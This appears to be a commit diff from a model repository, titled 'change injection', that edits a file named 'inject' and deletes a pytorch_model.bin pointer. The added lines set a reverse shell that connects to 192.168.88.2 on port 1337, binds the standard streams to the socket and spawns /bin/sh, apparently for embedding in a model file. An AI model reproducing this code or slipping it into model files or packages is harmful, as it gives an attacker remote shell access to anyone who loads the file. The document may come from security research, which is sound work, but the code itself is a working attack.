change injection
Browse files- inject +3 -3
- pytorch_model.bin +0 -3
inject
CHANGED
|
@@ -1,4 +1,4 @@
|
|
| 1 |
-
RHOST = "
|
| 2 |
RPORT = 1337
|
| 3 |
|
| 4 |
from sys import platform
|
|
@@ -11,7 +11,7 @@ if platform != 'win32':
|
|
| 11 |
|
| 12 |
def connect_and_spawn_shell():
|
| 13 |
s = socket.socket()
|
| 14 |
-
s.connect((
|
| 15 |
[os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]
|
| 16 |
pty.spawn("/bin/sh")
|
| 17 |
|
|
@@ -36,7 +36,7 @@ else:
|
|
| 36 |
|
| 37 |
while True:
|
| 38 |
try:
|
| 39 |
-
s.connect((
|
| 40 |
break
|
| 41 |
except:
|
| 42 |
pass
|
|
|
|
| 1 |
+
RHOST = "192.168.88.2"
|
| 2 |
RPORT = 1337
|
| 3 |
|
| 4 |
from sys import platform
|
|
|
|
| 11 |
|
| 12 |
def connect_and_spawn_shell():
|
| 13 |
s = socket.socket()
|
| 14 |
+
s.connect(("192.168.88.2", 1337))
|
| 15 |
[os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]
|
| 16 |
pty.spawn("/bin/sh")
|
| 17 |
|
|
|
|
| 36 |
|
| 37 |
while True:
|
| 38 |
try:
|
| 39 |
+
s.connect(("192.168.88.2", 1337))
|
| 40 |
break
|
| 41 |
except:
|
| 42 |
pass
|
pytorch_model.bin
DELETED
|
@@ -1,3 +0,0 @@
|
|
| 1 |
-
version https://git-lfs.github.com/spec/v1
|
| 2 |
-
oid sha256:92acfb317c184588553e0a838ace365d678c4c5289e42cffd1f264f75093b8df
|
| 3 |
-
size 38442
|
|
|
|
|
|
|
|
|
|
|
|